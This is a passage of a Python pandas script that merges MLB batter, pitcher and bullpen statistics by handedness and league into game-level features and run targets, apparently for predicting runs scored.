'SO_LEFT_batter_Std', 'RBI_LEFT_batter_Std', 'DP_LEFT_batter_Std']\r\nfor div in div_9:\r\n df1[div] = round(df1[div]/df1['PA_batter_Std'],2)\r\n\r\nplayer_frame = Players(data = df1, \r\n column_names = ['mlb_name', 'mlb_id', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'PA_batter_Std', 'R_batter_Std', 'SO_batter_Std', 'RBI_batter_Std', 'DP_batter_Std', 'AVG_batter_Std', 'OBP_batter_Std', 'SLG_batter_Std', 'OPS_batter_Std', 'ISO_batter_Std',\r\n 'oppOPS_batter_Std', 'TAv_batter_Std', 'VORP_batter_Std', 'FRAA_batter_Std', \r\n 'BWARP_batter_Std', 'BASES_VS_AB_batter_Std', 'SDTHB_BAT'],\r\n column_titles = ['player_name', 'player_id', 'player_position', 'team', 'team_ini', 'bat_hand', 'league',\r\n 'batter_PA', 'batter_runs', 'batter_SO', 'batter_RBI', 'batter_DP', 'batter_AVG', 'batter_OBP', \r\n 'batter_SLG', 'batter_OPS', 'batter_ISO', 'batter_oppOPS', 'batter_TAv', 'batter_VORP', \r\n 'batter_FRAA', 'batter_BWARP', 'batter_BASES_VS_AB', 'hit_mult'])\r\n\r\nplayer_frame_right = Players(data = df1, \r\n column_names = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'G_RIGHTbatter_Std', 'PA_RIGHTbatter_Std', 'R_RIGHTbatter_Std', 'TB_RIGHTbatter_Std', \r\n 'SO_RIGHTbatter_Std', 'RBI_RIGHTbatter_Std', 'DP_RIGHTbatter_Std', 'FB%_RIGHTbatter_Std', \r\n 'GB%_RIGHTbatter_Std', 'LD%_RIGHTbatter_Std', 'POP%_RIGHTbatter_Std', 'ISO_RIGHTbatter_Std', \r\n 'AVG_RIGHTbatter_Std', 'OBP_RIGHTbatter_Std', 'SLG_RIGHTbatter_Std', 'TAV_RIGHTbatter_Std', \r\n 'BASES_VS_AB_RIGHTbatter_Std', 'SDTHB_BATR'],\r\n column_titles = ['player_name', 'player_position', 'team', 'team_ini', 'bat_hand', 'league',\r\n 'bat_games_R', 'bat_PA_R', 'bat_runs_R', 'bat_TB_R', 'bat_SO_R', 'bat_RBI_R', \r\n 'bat_DP_R', 'bat_FB%_R', 'bat_GB%_R', 'bat_LD%_R', 'bat_POP%_R', 'bat_ISO_R', \r\n 'bat_AVG_R', 'bat_OBP_R', 'bat_SLG_R', 'bat_TAV_R', 'batter_BASES_VS_AB_R', \r\n 'hit_mult_R'])\r\n \r\nplayer_frame_left = Players(data = df1, \r\n column_names = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'G_LEFT_batter_Std', 'PA_LEFT_batter_Std', 'R_LEFT_batter_Std', 'TB_LEFT_batter_Std', \r\n 'SO_LEFT_batter_Std', 'RBI_LEFT_batter_Std', 'DP_LEFT_batter_Std', 'FB%_LEFT_batter_Std', \r\n 'GB%_LEFT_batter_Std', 
'LD%_LEFT_batter_Std', 'POP%_LEFT_batter_Std', 'ISO_LEFT_batter_Std', \r\n 'AVG_LEFT_batter_Std', 'OBP_LEFT_batter_Std', 'SLG_LEFT_batter_Std', 'TAV_LEFT_batter_Std', \r\n 'BASES_VS_AB_LEFT_batter_Std', 'SDTHB_BATR'],\r\n column_titles = ['player_name', 'player_position', 'team', 'team_ini', 'bat_hand', 'league',\r\n 'bat_games_L', 'bat_PA_L', 'bat_runs_L', 'bat_TB_L', 'bat_SO_L', 'bat_RBI_L', \r\n 'bat_DP_L', 'bat_FB%_L', 'bat_GB%_L', 'bat_LD%_L', 'bat_POP%_L', 'bat_ISO_L', \r\n 'bat_AVG_L', 'bat_OBP_L', 'bat_SLG_L', 'bat_TAV_L', 'batter_BASES_VS_AB_L', \r\n 'hit_mult_L'])\r\n\r\n\r\n# Create Instance from Class\r\nplayer_frames = player_frame.create_df()\r\nplayer_frames_right = player_frame_right.create_df()\r\nplayer_frames_left =player_frame_left.create_df()\r\n\r\n# Create Dictionary from Data\r\nplayer_dic = player_frame.create_dict('mlb_name')\r\nplayer_dict_tot = player_dic[1]\r\nplayer_dict_stats = player_dic[2]\r\n\r\n# Create Dictionary of batters vs righty pitchers\r\nplayer_dic_right = player_frame_right.create_dict('mlb_name')\r\nplayer_dict_tot_right = player_dic_right[1]\r\nplayer_dict_stats_right = player_dic_right[2]\r\n\r\n# Create Dictionary of batters vs lefty pitchers\r\nplayer_dic_left = player_frame_left.create_dict('mlb_name')\r\nplayer_dict_tot_left = player_dic_left[1]\r\nplayer_dict_stats_left = player_dic_left[2]\r\n\r\ndf2 = pd.read_csv(\"MLB/pitcher_all.csv\", encoding='latin-1')\r\ndf2['SO_Pitching_Std'] = round(df2['SO_Pitching_Std']/df2['PA_Pitching_Std'],2)\r\ndf2['G_Pitching_Std'] = round(df2['IP_Pitching_Std']/df2['G_Pitching_Std'],2)\r\ndf2['G_Pitching_Std'] = 1 - df2['G_Pitching_Std']/9\r\n\r\n\r\npitcher_frame = Players(data = df2, \r\n column_names = ['mlb_name', 'mlb_id', 'mlb_pos', 'mlb_team_long', 'TEAM', 'throws', 'IP_Pitching_Std',\r\n 'PA_Pitching_Std', 'SO_Pitching_Std', 'DRA_Pitching_Std', 'ERA_Pitching_Std',\r\n 'PPF_Pitching_Std', 'VORP_Pitching_Std', 'FIP_Pitching_Std', 'PVORP_Pitching_Std',\r\n 'PWARP_Pitching_Std', 'BASES_VS_AB_Pitching_Std', 'SDTHB_ALL', 'H_Def_Ef', 'HR_Def_Ef', \r\n 'GB%_Def_Ef', 'FB%_Def_Ef', 'LD%_Def_Ef', 'POP%_Def_Ef', 'DP%_Def_Ef'],\r\n column_titles = ['player_name', 'player_id', 'player_position', 'team', 'team_ini', 'pitcher_hand', 'pitcher_IP',\r\n 'pitcher_PA', 'pitcher_SO', 'pitcher_DRA', 'pitcher_ERA', 'pitcher_PPF', 'pitcher_VORP', \r\n 'pitcher_FIP', 'pitcher_PVORP', 'pitcher_PWARP', 'pitcher_BASES_VS_AB', 'pitcher_hit_mult',\r\n 'def_H', 'def_HR', 'def_GB%', 'def_FB%', 'def_LD%', 'def_POP%', 'def_DP%'])\r\n\r\n\r\n# Create Instance from Class\r\npitcher_frames = pitcher_frame.create_df()\r\n\r\n# Create Dictionary from Data\r\npitcher_dic = pitcher_frame.create_dict('mlb_name')\r\npitcher_dict_tot = pitcher_dic[1]\r\npitcher_dict_stats = pitcher_dic[2]\r\n\r\n\r\ncolumn_names_left = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'G_LEFT_batter_Std', 'PA_LEFT_batter_Std', 'R_LEFT_batter_Std', 'TB_LEFT_batter_Std', \r\n 'SO_LEFT_batter_Std', 'RBI_LEFT_batter_Std', 'DP_LEFT_batter_Std', 'FB%_LEFT_batter_Std', \r\n 'GB%_LEFT_batter_Std', 'LD%_LEFT_batter_Std', 'POP%_LEFT_batter_Std', 'ISO_LEFT_batter_Std', \r\n 'AVG_LEFT_batter_Std', 'OBP_LEFT_batter_Std', 'SLG_LEFT_batter_Std', 'TAV_LEFT_batter_Std', \r\n 'BASES_VS_AB_LEFT_batter_Std', 'SDTHB_BATR']\r\n\r\ncolumn_names_right = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'G_RIGHTbatter_Std', 'PA_RIGHTbatter_Std', 'R_RIGHTbatter_Std', 'TB_RIGHTbatter_Std', \r\n 'SO_RIGHTbatter_Std', 
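
# --- Editor's sketch. create_dict('mlb_name') above returns per-player
# lookup dicts from the unshown Players helper; the plain pandas idiom for
# that shape is set_index(...).to_dict(orient='index') (data illustrative):
import pandas as pd

demo = pd.DataFrame({"mlb_name": ["SMITH", "JONES"],
                     "pitcher_ERA": [3.10, 4.20]})
stats_by_name = demo.set_index("mlb_name").to_dict(orient="index")
print(stats_by_name["SMITH"]["pitcher_ERA"])  # -> 3.1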
'RBI_RIGHTbatter_Std', 'DP_RIGHTbatter_Std', 'FB%_RIGHTbatter_Std', \r\n 'GB%_RIGHTbatter_Std', 'LD%_RIGHTbatter_Std', 'POP%_RIGHTbatter_Std', 'ISO_RIGHTbatter_Std', \r\n 'AVG_RIGHTbatter_Std', 'OBP_RIGHTbatter_Std', 'SLG_RIGHTbatter_Std', 'TAV_RIGHTbatter_Std', \r\n 'BASES_VS_AB_RIGHTbatter_Std', 'SDTHB_BATR']\r\n\r\ncolumn_names_all = ['mlb_name', 'mlb_id', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter_Std',\r\n 'PA_batter_Std', 'R_batter_Std', 'SO_batter_Std', 'RBI_batter_Std', 'DP_batter_Std', 'AVG_batter_Std', 'OBP_batter_Std', 'SLG_batter_Std', 'OPS_batter_Std', 'ISO_batter_Std',\r\n 'oppOPS_batter_Std', 'TAv_batter_Std', 'VORP_batter_Std', 'FRAA_batter_Std', \r\n 'BWARP_batter_Std', 'BASES_VS_AB_batter_Std', 'SDTHB_BAT']\r\n\r\ncolumn_names_new = ['mlb_name', 'mlb_pos', 'mlb_team_long', 'TEAM', 'bats', 'LG_batter', 'G_batter',\r\n 'PA_batter', 'R_batter', 'TB_batter', 'SO_batter', 'RBI_batter', 'DP_batter', 'FB%_batter', 'GB%_batter', 'LD%_batter', 'POP%_batter', 'ISO_batter',\r\n 'AVG_batter', 'OBP_batter', 'SLG_batter', 'TAV_batter', \r\n 'BASES_VS_AB_batter', 'SDTHB_BAT']\r\n\r\ndf1_left_index = [list(df1.columns).index(name) for name in column_names_left] \r\ndf1_right_index = [list(df1.columns).index(name) for name in column_names_right]\r\ndf1_all_index = [list(df1.columns).index(name) for name in column_names_all]\r\n\r\n'''\r\ndf1_left_index = []\r\nfor name in column_names_left:\r\n ind = list(df1.columns).index(name)\r\n df1_left_index.append(ind)\r\n \r\ndf1_right_index = []\r\nfor name in column_names_right:\r\n ind = list(df1.columns).index(name)\r\n df1_right_index.append(ind)\r\n \r\n\r\ndf1_all_index = []\r\nfor name in column_names_all:\r\n ind = list(df1.columns).index(name)\r\n df1_all_index.append(ind)\r\n'''\r\n\r\n# Create Lineups\r\nplayer_lineups = player_frame.create_lineups(df1_all_index, df1_right_index, df1_left_index)\r\nplayer_lineup = player_lineups[0]\r\nplayer_lineup_right = player_lineups[1]\r\nplayer_lineup_left = player_lineups[2]\r\nplayer_lineup_right_alt = player_lineups[3]\r\nplayer_lineup_left_alt = player_lineups[4]\r\n\r\n\r\n#for k,v in player_lineup.items():\r\n #v.columns = column_names_new\r\nfor k,v in player_lineup_right.items():\r\n v.columns = column_names_new\r\nfor k,v in player_lineup_left.items():\r\n v.columns = column_names_new\r\nfor k,v in player_lineup_right_alt.items():\r\n v.columns = column_names_new\r\nfor k,v in player_lineup_left_alt.items():\r\n v.columns = column_names_new\r\n\r\n# Based on if team is in AL or NL(not on stadium) - Interleague games won't be accurate\r\ndef team_mean_batting(player_dic):\r\n team_mean = {}\r\n for team in list(player_dic.keys()):\r\n team_info = {k:v for k,v in zip(list(player_dic[team].keys()[6:]), list(player_dic[team].iloc[:,6:].mean()))} \r\n team_mean[team] = team_info\r\n team_info = {}\r\n return team_mean\r\n\r\n\r\n'''\r\n# Based on if team is in AL or NL(not on stadium) - Interleague games won't be accurate\r\ndef team_mean_batting(player_dic):\r\n team_mean, team_info = {},{}\r\n for team in list(player_dic.keys()):\r\n for k,v in zip(list(player_dic[team].keys()[6:]), list(player_dic[team].iloc[:,6:].mean())):\r\n team_info[k] = v\r\n team_mean[team] = team_info\r\n team_info = {}\r\n return team_mean\r\n'''\r\n \r\nteam_mean = team_mean_batting(player_lineup)\r\n\r\n\r\n'''game_pitcher_stats_dict = {}\r\nfor k,v in game_dict_list.items():\r\n for k1,v1 in v.items():\r\n pitcher = game_dict_list[k]['Opponent_Pitcher']\r\n opponent = 
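
# --- Editor's sketch. team_mean_batting() above averages each lineup's
# numeric columns one team at a time; a single pandas groupby produces the
# same nested dict in one pass (columns illustrative):
import pandas as pd

lineups = pd.DataFrame({
    "team": ["NYY", "NYY", "BOS"],
    "bat_AVG": [0.280, 0.260, 0.300],
    "bat_OBP": [0.350, 0.330, 0.380],
})
team_mean = lineups.groupby("team").mean(numeric_only=True).to_dict(orient="index")
print(team_mean["NYY"])  # -> {'bat_AVG': 0.27, 'bat_OBP': 0.34}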
game_dict_list[k]['Opponent']\r\n if pitcher in list(pitcher_dict_stats.keys()) and opponent == pitcher_dict_stats[pitcher]['team'].upper():\r\n game_pitcher_stats_dict[k] = {**game_dict_list[k], **pitcher_dict_stats[pitcher]}'''\r\n\r\nfrom constant_variables import LEAGUE\r\ndef get_team_league(team_ini):\r\n for ini, league in LEAGUE.items():\r\n if ini == team_ini:\r\n return league\r\n\r\ngame_pitcher_stats_dict = {}\r\nfor k,v in game_dict_dates.items():\r\n for k1,v1 in v.items():\r\n pitcher = game_dict_dates[k]['Team_Pitch']\r\n opponent = game_dict_dates[k]['Stadium']\r\n if pitcher in list(pitcher_dict_stats.keys()) and opponent == pitcher_dict_stats[pitcher]['team_ini'].upper():\r\n game_pitcher_stats_dict[k] = {**game_dict_dates[k], **pitcher_dict_stats[pitcher]}\r\n\r\n\r\ngame_pitcher_batter_stats_dict, team_means = {},{}\r\nteam_mean_left = team_mean_batting(player_lineup_left)\r\nteam_mean_right = team_mean_batting(player_lineup_right)\r\nteam_mean_left_alt = team_mean_batting(player_lineup_left_alt)\r\nteam_mean_right_alt = team_mean_batting(player_lineup_right_alt)\r\nfor k,v in game_pitcher_stats_dict.items():\r\n for k1,v1 in v.items():\r\n team_ini = game_pitcher_stats_dict[k]['Team_Bat']\r\n if game_pitcher_stats_dict[k]['pitcher_hand'] == 'L' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'AL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'AL':\r\n team_means[team_ini] = team_mean_left[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'R' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'AL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'AL':\r\n team_means[team_ini] = team_mean_right[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'L' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'NL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'AL':\r\n team_means[team_ini] = team_mean_left_alt[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'R' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'AL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'NL':\r\n team_means[team_ini] = team_mean_right_alt[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'L' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'NL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'NL':\r\n team_means[team_ini] = team_mean_left[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'R' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'NL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'NL':\r\n team_means[team_ini] = team_mean_right[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'L' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'AL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'NL':\r\n team_means[team_ini] = team_mean_left_alt[team_ini]\r\n 
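
# --- Editor's sketch. The eight-way elif chain above reduces to a two-key
# lookup: only the pitcher's hand and whether the two leagues match matter
# (same leagues -> base splits, mixed leagues -> the _alt splits):
def pick_split(pitcher_hand, bat_league, stadium_league):
    same_league = bat_league == stadium_league
    table = {
        ("L", True): "team_mean_left",
        ("R", True): "team_mean_right",
        ("L", False): "team_mean_left_alt",
        ("R", False): "team_mean_right_alt",
    }
    return table[(pitcher_hand, same_league)]

print(pick_split("L", "NL", "AL"))  # -> team_mean_left_alt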
game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n elif game_pitcher_stats_dict[k]['pitcher_hand'] == 'R' and get_team_league(game_pitcher_stats_dict[k]['Team_Bat']) == 'NL' and get_team_league(game_pitcher_stats_dict[k]['Stadium']) == 'AL':\r\n team_means[team_ini] = team_mean_right_alt[team_ini]\r\n game_pitcher_batter_stats_dict[k] = {**game_pitcher_stats_dict[k], **team_means[team_ini]}\r\n\r\n\r\ngame_logs = pd.DataFrame(list(game_pitcher_batter_stats_dict.values()), columns = list(list(game_pitcher_batter_stats_dict.values())[0].keys()))\r\ngame_logs['pitcher_BASES_VS_AB'] = list(map((lambda x:round(float(x),2)), game_logs['pitcher_BASES_VS_AB']))\r\ngame_logs['pitcher_hit_mult'] = list(map((lambda x:round(float(x),2)), game_logs['pitcher_hit_mult']))\r\ngame_logs['Expected_Runs'][287] = float(3.0)\r\ngame_logs['Expected_Runs'] = game_logs['Expected_Runs'].astype(float)\r\ngame_logs = game_logs.groupby(game_logs.columns, axis = 1).transform(lambda x: x.fillna(x.mean()))\r\n\r\n\r\nind = []\r\nfor i in range(16,33):\r\n ind.append(i)\r\nind1 = [] \r\nfor i in range(35,51):\r\n ind1.append(i)\r\nind2 = [4,6,7,8]+ind+ind1\r\n\r\nfor i in ind2:\r\n game_logs.iloc[:, i] = game_logs.iloc[:, i].astype(float)\r\n\r\ny = game_logs['Runs'].astype(int)\r\nX = game_logs.iloc[:,ind2]\r\n\r\n\r\nfrom constant_variables import PLAYERS\r\ndef get_team_player(player_name):\r\n for player, name in PLAYERS.items():\r\n if player == player_name:\r\n #player_name = name\r\n return name\r\n break\r\n return player_name\r\n \r\n \r\n \r\ndaily_lineups = daily_lineups_pitch()\r\nunknown, logs = [], []\r\nfor d in game_logs['Date'].unique():\r\n for k,v in daily_lineups[d].items():\r\n for k1,v1 in v.items():\r\n if len(list(game_logs['pitcher_hand'][game_logs['Team_Bat']==k][game_logs['Date']==d]))>0 and list(game_logs['pitcher_hand'][game_logs['Team_Bat']==k][game_logs['Date']==d])[0] == 'R':\r\n try:\r\n daily_lineups[d][k][k1] = player_dict_stats_right[k1.upper()]\r\n except KeyError:\r\n try:\r\n logs.append(['RIGHT0:' + d,k,k1])\r\n k2 = get_team_player(k1)\r\n #daily_lineups[d][k][k2] = daily_lineups[d][k].pop(k1, None)\r\n daily_lineups[d][k][k1] = player_dict_stats_right[k2.upper()]\r\n logs.append(['RIGHT:' + d,k,k1,k2])\r\n except KeyError:\r\n unknown.append(k1)\r\n logs.append(['RIGHT1:' + d,k,k1,k2])\r\n else:\r\n try:\r\n daily_lineups[d][k][k1] = player_dict_stats_left[k1.upper()]\r\n except KeyError:\r\n try:\r\n logs.append(['LEFT0:' + d,k,k1])\r\n k2 = get_team_player(k1)\r\n #daily_lineups[d][k][k2] = daily_lineups[d][k].pop(k1, None)\r\n daily_lineups[d][k][k1] = player_dict_stats_left[k2.upper()]\r\n logs.append(['LEFT:' + d,k,k1,k2])\r\n except KeyError:\r\n unknown.append(k1)\r\n logs.append(['LEFT1:' + d,k,k1,k2])\r\nunknown_uniq = []\r\nfor un in unknown:\r\n if un not in unknown_uniq:\r\n unknown_uniq.append(un)\r\n\r\nunknown_info = []\r\nfor k,v in daily_lineups.items():\r\n for k1,v1 in v.items():\r\n for k2,v2 in v1.items():\r\n if k2 in unknown_uniq:\r\n unknown_info.append([k,k1,k2])\r\n\r\nfor un in unknown_info: \r\n daily_lineups[un[0]][un[1]].pop(un[2], None)\r\n \r\n\r\ndaily_lineups_mean, daily_lineups_mean1, day, list_team, list_team_mean, list_mean, dates, list_teams = {}, {}, {}, [], [], [], [], []\r\nfor k,v in daily_lineups.items():\r\n for k1,v1 in v.items():\r\n for k2,v2 in v1.items():\r\n list_team.append(list(v2.values())[9:])\r\n hitters_game = pd.DataFrame(np.column_stack([list_team]), columns = 
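
# --- Editor's sketch. The groupby(columns, axis=1).transform(...) line above
# fills each column's NaNs with that column's mean; the simpler and more
# conventional idiom is fillna with the column means directly:
import numpy as np
import pandas as pd

demo = pd.DataFrame({"a": [1.0, np.nan, 3.0], "b": [np.nan, 2.0, 4.0]})
print(demo.fillna(demo.mean(numeric_only=True)))  # NaNs become 2.0 and 3.0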
list(v2.keys())[9:], dtype = float)\r\n daily_lineups_mean[k + ' ' + k1] = hitters_game.mean()\r\n for lk, lv in zip(list(v2.keys())[9:], list(hitters_game.mean())):\r\n day[lk] = lv\r\n daily_lineups_mean1[k + ' ' + k1] = day\r\n list_team, list_mean, list_teams, day = [], [], [], {}\r\n \r\n \r\ngame_pit_bat_lineup_dic = {} \r\nfor k,v in game_pitcher_batter_stats_dict.items():\r\n if k in daily_lineups_mean1.keys():\r\n game_pit_bat_lineup_dic[k] = {**game_pitcher_batter_stats_dict[k], **daily_lineups_mean1[k]}\r\n\r\ncol_game = ['bat_SO_R',\r\n 'bat_RBI_R',\r\n 'bat_DP_R',\r\n 'bat_FB%_R',\r\n 'bat_GB%_R',\r\n 'bat_LD%_R',\r\n 'bat_POP%_R',\r\n 'bat_ISO_R',\r\n 'bat_AVG_R',\r\n 'bat_OBP_R',\r\n 'bat_SLG_R',\r\n 'bat_TAV_R',\r\n 'batter_BASES_VS_AB_R',\r\n 'hit_mult_R',\r\n 'bat_SO_L',\r\n 'bat_RBI_L',\r\n 'bat_DP_L',\r\n 'bat_FB%_L',\r\n 'bat_GB%_L',\r\n 'bat_LD%_L',\r\n 'bat_POP%_L',\r\n 'bat_ISO_L',\r\n 'bat_AVG_L',\r\n 'bat_OBP_L',\r\n 'bat_SLG_L',\r\n 'bat_TAV_L',\r\n 'batter_BASES_VS_AB_L',\r\n 'hit_mult_L']\r\n\r\ncol_new = ['bat_SO',\r\n 'bat_RBI',\r\n 'bat_DP',\r\n 'bat_FB%',\r\n 'bat_GB%',\r\n 'bat_LD%',\r\n 'bat_POP%',\r\n 'bat_ISO',\r\n 'bat_AVG',\r\n 'bat_OBP',\r\n 'bat_SLG',\r\n 'bat_TAV',\r\n 'batter_BASES_VS_AB',\r\n 'hit_mult',\r\n 'bat_SO',\r\n 'bat_RBI',\r\n 'bat_DP',\r\n 'bat_FB%',\r\n 'bat_GB%',\r\n 'bat_LD%',\r\n 'bat_POP%',\r\n 'bat_ISO',\r\n 'bat_AVG',\r\n 'bat_OBP',\r\n 'bat_SLG',\r\n 'bat_TAV',\r\n 'batter_BASES_VS_AB',\r\n 'hit_mult']\r\n\r\ncol_new1 = ['bat_SO',\r\n 'bat_RBI',\r\n 'bat_DP',\r\n 'bat_FB%',\r\n 'bat_GB%',\r\n 'bat_LD%',\r\n 'bat_POP%',\r\n 'bat_ISO',\r\n 'bat_AVG',\r\n 'bat_OBP',\r\n 'bat_SLG',\r\n 'bat_TAV',\r\n 'batter_BASES_VS_AB',\r\n 'hit_mult']\r\n\r\ngame_pit_bat_lineup_dic2, new_dict = {}, {}\r\nfor k,v in game_pit_bat_lineup_dic.items():\r\n for k1,v1 in v.items():\r\n if k1 in col_game:\r\n ind = col_game.index(k1)\r\n new_dict[col_new[ind]] = game_pit_bat_lineup_dic[k][k1]\r\n else:\r\n new_dict[k1] = game_pit_bat_lineup_dic[k][k1]\r\n game_pit_bat_lineup_dic2[k] = new_dict\r\n new_dict = {}\r\n \r\ngame_pit_bat_lineup_dic1 = game_pit_bat_lineup_dic\r\n\r\ngame_logs1 = pd.DataFrame(list(game_pit_bat_lineup_dic2.values()), columns = list(list(game_pit_bat_lineup_dic2.values())[0].keys()))\r\n'''game_logs['pitcher_BASES_VS_AB'] = list(map((lambda x:round(float(x),2)), game_logs['pitcher_BASES_VS_AB']))\r\ngame_logs['pitcher_hit_mult'] = list(map((lambda x:round(float(x),2)), game_logs['pitcher_hit_mult']))\r\ngame_logs['Expected_Runs'][287] = float(3.0)\r\ngame_logs['Expected_Runs'] = game_logs['Expected_Runs'].astype(float)'''\r\n\r\ndef game_nan_index(column):\r\n indicies = []\r\n col_list = list(column.values)\r\n for i,game in enumerate(col_list): \r\n if game == 'nan':\r\n indicies.append(i)\r\n return indicies\r\n \r\ninde1 = game_nan_index(game_logs1['Expected_Runs'])\r\ngame_logs1['Expected_Runs'][inde1] = float(3.5)\r\n##game_logs1 = game_logs1.groupby(game_logs1.columns, axis = 1).transform(lambda x: x.fillna(x.mean()))\r\n\r\n\r\nind = []\r\nfor i in range(17,33):\r\n ind.append(i)\r\nind1 = [] \r\nfor i in range(36,66):\r\n ind1.append(i)\r\nind2 = [4,6,7,8]+ind+ind1\r\n\r\nfor i in ind2:\r\n game_logs1.iloc[:, i] = game_logs1.iloc[:, i].astype(float)\r\n game_logs1.iloc[:, i] = round(game_logs1.iloc[:, i],2)\r\n\r\ny = game_logs1['Runs'].astype(int)\r\nX = game_logs1.iloc[:,ind2]\r\n \r\n\r\ndf4 = pd.read_csv(\"MLB/pitcher_vs_side.csv\", encoding='latin-1')\r\ndf4 = df4.iloc[:,1:]\r\n\r\nfrom constant_variables import 
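
# --- Editor's sketch. The col_game/col_new parallel lists above rename keys
# via repeated list.index() scans; a zip-built mapping does the same rename
# in one dict comprehension (keys shown are a small illustrative subset):
RENAME = dict(zip(["bat_SO_R", "bat_SO_L", "bat_RBI_R", "bat_RBI_L"],
                  ["bat_SO",   "bat_SO",   "bat_RBI",   "bat_RBI"]))

record = {"bat_SO_R": 0.21, "bat_RBI_L": 0.12, "Team_Bat": "NYY"}
renamed = {RENAME.get(k, k): v for k, v in record.items()}
print(renamed)  # -> {'bat_SO': 0.21, 'bat_RBI': 0.12, 'Team_Bat': 'NYY'}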
pit_side_col_list\r\npitcher_side_frame = Players(data = df4, \r\n column_names = pit_side_col_list,\r\n column_titles = pit_side_col_list)\r\n\r\n\r\n# Create Instance from Class\r\npitcher_side_frames = pitcher_side_frame.create_df()\r\n\r\n# Create Dictionary from Data\r\npitcher_side_dic = pitcher_side_frame.create_dict('NAME')\r\npitcher_side_dict_tot = pitcher_side_dic[1]\r\npitcher_side_dict_stats = pitcher_side_dic[2]\r\n\r\ntest = []\r\ndaily_lineups_mean_pit, daily_lineups_mean1_pit, day_pit, list_team_pit, list_team_mean_pit, list_mean_pit, dates_pit, list_teams_pit = {}, {}, {}, [], [], [], [], []\r\nfor k,v in daily_lineups.items():\r\n for k1,v1 in v.items():\r\n for k2,v2 in v1.items():\r\n try: \r\n team_pit = game_pitcher_batter_stats_dict[k + ' ' + k1]['Team_Pitch']\r\n hand_pit = game_pitcher_batter_stats_dict[k + ' ' + k1]['pitcher_hand']\r\n except KeyError:\r\n break\r\n bat_hand = list(v2.values())[3]\r\n if bat_hand == 'S' and hand_pit == 'L':\r\n bat_hand = 'R'\r\n elif bat_hand == 'S' and hand_pit == 'R':\r\n bat_hand = 'L'\r\n if team_pit.upper() in list(pitcher_side_frames['NAME']) and pitcher_side_frames.iloc[:,5:][pitcher_side_frames['NAME']==team_pit][pitcher_side_frames['HAND_pit']==bat_hand].empty == False:\r\n list_team_pit.append(pitcher_side_frames.iloc[:,5:][pitcher_side_frames['NAME']==team_pit][pitcher_side_frames['HAND_pit']==bat_hand])\r\n dates_pit.append(team_pit)\r\n else:\r\n test.append([team_pit, bat_hand, k2, k1, k, bat_hand])\r\n if len(list_team_pit) > 0:\r\n pitchers_game = pd.DataFrame(pd.concat([li for li in list_team_pit]), columns = list(pitcher_side_frames.iloc[:,5:].columns), dtype = float)\r\n daily_lineups_mean_pit[k + ' ' + k1] = pitchers_game.mean()\r\n # moved forward 1 tab\r\n for lk, lv in zip(list(pitcher_side_frames.iloc[:,5:].columns), list(pitchers_game.mean())):\r\n day_pit[lk] = lv\r\n daily_lineups_mean1_pit[k + ' ' + k1] = day_pit\r\n list_team_pit, list_mean_pit, list_teams_pit, day_pit = [], [], [], {}\r\n \r\ngame_pitcher_bat_lineup_dic = {} \r\nfor k,v in game_pit_bat_lineup_dic2.items():\r\n if k in daily_lineups_mean1_pit.keys():\r\n game_pitcher_bat_lineup_dic[k] = {**game_pit_bat_lineup_dic2[k], **daily_lineups_mean1_pit[k]}\r\n\r\ndf4 = pd.read_csv(\"MLB/bullpen.csv\", encoding='latin-1')\r\nbull = {}\r\ngame_pitcher_bat_lineup_dic1 = game_pitcher_bat_lineup_dic\r\n#game_pitcher_bat_lineup_dic = game_pitcher_bat_lineup_dic1\r\ngame_pitcher_bat_lineup_bullpen_dic = {} \r\nfor k,v in game_pitcher_bat_lineup_dic.items():\r\n pitcher = v['Team_Pitch']\r\n team = v['team_ini']\r\n for col in list(df4.columns[1:-1]):\r\n ratio = df2['G_Pitching_Std'][df2['mlb_name'] == pitcher].values[0]\r\n #bull[col] = df4[col][df4['Team_Ini']==team].values[0]\r\n game_pitcher_bat_lineup_dic[k][col] = df4[col][df4['Team_Ini']==team].values[0]*ratio\r\n\r\ngame_logs2 = pd.DataFrame(list(game_pitcher_bat_lineup_dic.values()), columns = 